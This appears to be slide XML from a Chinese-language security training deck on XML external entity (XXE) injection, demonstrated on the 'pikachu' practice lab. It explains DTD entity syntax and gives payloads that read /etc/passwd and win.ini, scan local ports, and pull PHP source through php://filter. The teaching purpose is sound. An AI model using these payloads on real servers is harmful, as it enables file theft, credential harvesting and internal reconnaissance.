              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD33DC6-01BB-61CB-1BEA-1A22FC660DBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15902609" y="5520271"/>
            <a:ext cx="7765774" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>实体又分为一般实体和参数实体 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、一般实体的声明语法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>一般实体的声明格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>实体名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>引用实体的方式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>实体名；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、参数实体只能在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>中使用，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>参数实体的声明格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> &lt;!ENTITY  % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>实体名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>引用实体的方式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>实体名；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2684288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753278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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6058D843-F707-9A96-97DF-7CC6FF5B7632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2773194"/>
            <a:ext cx="8905002" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>外部实体注引用时支持多种协议，大致包含以下情况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039335D0-9923-16E6-7F76-2A6B18747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85" y="4082511"/>
            <a:ext cx="13241966" cy="6860295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3981851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971550" y="2102852"/>
            <a:ext cx="12458700" cy="907940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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取任意文件和端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pikachu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、攻击前简单判断下是否存在回显数据</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CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"this is a test!"</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、在知道存在回显后，可以尝试读取一些敏感目录，比如读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>c:/windows/win.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，它是每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统都有的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统的的话可以读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，当然想要读取其他文件目录，只需更改绝对路径即可（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>file://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议只能用绝对路径）。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如下：</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 SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"file:///etc/passwd"</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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析支持列目录，攻击者通过列目录、读文件，获取账号密码后进一步攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口扫描时，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file:///etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”替换为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口开放时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器响应报错，端口关闭时则返回无法连接的信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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漏洞实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ADB2C97-17DE-1C95-3C6F-5ED0CBE24236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13967583" y="2102852"/>
            <a:ext cx="7042910" cy="3046107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D26881A7-59E3-1DC4-D065-4A8DE05C4A64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="2137" b="27630"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13967583" y="6775183"/>
            <a:ext cx="8764545" cy="5865669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41578555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漏洞实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26BF521-100F-25D9-1E64-75CDF8D35C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2567468"/>
            <a:ext cx="21248094" cy="920251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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>： 有回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码一般用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php://filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议读取会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用解析。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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 SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://filter/convert.base64-encode/resource=/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>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得到是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码的数据，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码即可得到源码文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{559F8682-7A83-68CE-FE3F-4CAECE5F0DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
